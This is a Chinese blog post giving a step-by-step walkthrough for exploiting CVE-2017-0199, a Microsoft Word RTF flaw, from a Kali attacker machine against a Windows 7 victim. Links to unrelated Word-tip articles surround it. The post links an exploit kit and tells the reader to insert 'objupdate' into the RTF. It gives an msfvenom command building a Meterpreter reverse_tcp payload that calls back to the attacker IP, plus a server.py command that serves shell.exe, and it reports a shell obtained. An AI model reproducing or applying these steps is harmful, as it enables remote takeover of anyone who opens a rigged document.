你打开我的word，就会被我控制（CVE-2017-0199）

作者: 钦玄 | 来源:发表于2017-04-20 20:41 被阅读100次

你打开我的word，就会被我控制（CVE-2017-0199）
报奖材料和论文
你试图控制的就会控制你
我被我的日历所控制
去掉word页眉上横线
Word文档中的图片该如何另存为
藏于心底
神器推荐之PDF转Word
docx文件基本结构
python高级学习

准备工作：
攻击者电脑（kali）：192.168.1.130
被攻击者电脑（win7）：192.168.115
下载漏洞利用工具：https://github.com/haibara3839/CVE-2017-0199-master
把innocent.doc和server.py两个文件放到攻击者电脑上，并开启Apache服务
漏洞利用：
1、新建个word，向下面这样配置

2、保存成RTF格式

3、使用记事本打开test.rtf文件，在文件中查找objautlink，然后在objautlink后面插入objupdate

4、然后配置反弹shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=6666 -f exe > shell.exe
5、运行server.py服务

先把Apache服务关闭
python server.py 80 http://192.168.1.130/shell.exe /var/www/html/shell.exe
被攻击端打开word，点击是

成功返回shell

你打开我的word，就会被我控制（CVE-2017-0199）
准备工作：攻击者电脑（kali）：192.168.1.130被攻击者电脑（win7）：192.168.115下载漏...
报奖材料和论文
面对报奖材料和论文，我打开一个word，就会被关上一个智慧之窗。
你试图控制的就会控制你
所有你试图控制的，都会控制你。而其实除了我们自己，我们能控制的外界因素实在太少了。那些你汲汲以求的，那些你不想遭...
我被我的日历所控制
那天我们一起去看了电影，在那之后的两天，星河发现她手机日历上清晰的记录着——周三看碟中谍6，微思极恐，设想一下，假...
去掉word页眉上横线
一、word中有word图标 word文档打开后发现文档中有两个word文档图标，双击相应的图标，就可以打开该文档...
Word文档中的图片该如何另存为
方法/步骤打开你需要导出图片的Word文档。Word文档中的图片该如何另存为打开后，选择菜单栏的【文件】--【...
藏于心底
所有道理我都懂我也知道你其实就喜欢被我喜欢的感觉可算每当你对我稍微好一点的时候我就会控制不住自己静待机缘巧...
神器推荐之PDF转Word
PDF转Word三大招 1、直接用word打开这是我所知道的最简单粗暴的方法！在Word2013、Word20...
docx文件基本结构
template.docx 如上word模板使用zip打开如下进入word 打开document.xml 在...
python高级学习
一、文件的打开与关闭如果想用word编写一份简历,应该有哪些流程呢? 1、打开word软件，新建一个word文件...